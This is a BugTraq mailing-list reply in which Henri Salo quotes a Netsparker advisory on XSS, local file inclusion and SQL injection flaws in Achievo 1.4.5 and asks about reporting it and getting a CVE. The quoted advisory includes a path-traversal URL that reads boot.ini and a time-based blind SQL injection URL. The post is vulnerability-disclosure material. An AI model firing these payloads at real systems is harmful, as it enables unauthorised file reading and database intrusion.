BugTraq
Re: [Full-disclosure] XSS, LFI and SQL Injection Vulnerabilities in Achievo Nov 02 2012 06:37AM
Henri Salo (henri nerv fi)
On Thu, Nov 01, 2012 at 02:12:10PM +0200, Netsparker Advisories wrote:
> Information
> --------------------
> Name : XSS, LFI and SQL Injection Vulnerabilities in Achievo
> Software : Achievo 1.4.5 and possibly below.
> Vendor Homepage : http://www.achievo.org
> Vulnerability Type : Cross-Site Scripting, Local File Inclusion and SQL
> Injection
> Severity : Critical
> Researcher : Canberk Bolat
> Advisory Reference : NS-12-016
>
> Description
> --------------------
> Achievo is a flexible web-based resource management tool for business
> environments. Achievo's resource management capabilities will enable
> organisations to support their business processes in a simple, but
> effective manner.
>
> Details
> --------------------
> Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
> version 1.4.5.
> XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
> atkselector, atkfilter, searchString)
> LFI:
> http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3

> SQL Injection:
> http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userp
refs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25)
)A)&atklevel=-1&atkprevlevel=0&=3
> You can read the full article about Cross-Site Scripting, LFI and SQL
> Injection vulnerabilities from here:
>
> Cross-site Scripting (XSS):
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
> Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
> Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
>
> Solution
> --------------------
> -
>
> Advisory Timeline
> --------------------
> 23/01/2011 - First contact
> 25/02/2012 - Second contact - No response
> 01/11/2012 - Advisory released
>
> Credits
> --------------------
> It has been discovered on testing of Netsparker, Web Application Security
> Scanner - http://www.mavitunasecurity.com/netsparker/.
>
> References
> --------------------
> Vendor Url / Patch : -
> MSL Advisory Link :
> http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilitie
s-in-achievo/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
>
> About Netsparker
> --------------------
> Netsparker® can find and report security issues such as SQL Injection and
> Cross-site Scripting (XSS) in all web applications regardless of the
> platform and the technology they are built on. Netsparker's unique
> detection and exploitation techniques allows it to be dead accurate in
> reporting hence it's the first and the only False Positive Free web
> application security scanner.

Where did you report this vulnerability? Achievo-project does reply to emails and fix security vulnerabilities. Does this vulnerability have CVE-identifier, which would help in communication.

I can report this to the project again and request CVE-identifier if needed. Please confirm that this is OK for you.

- Henri Salo

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus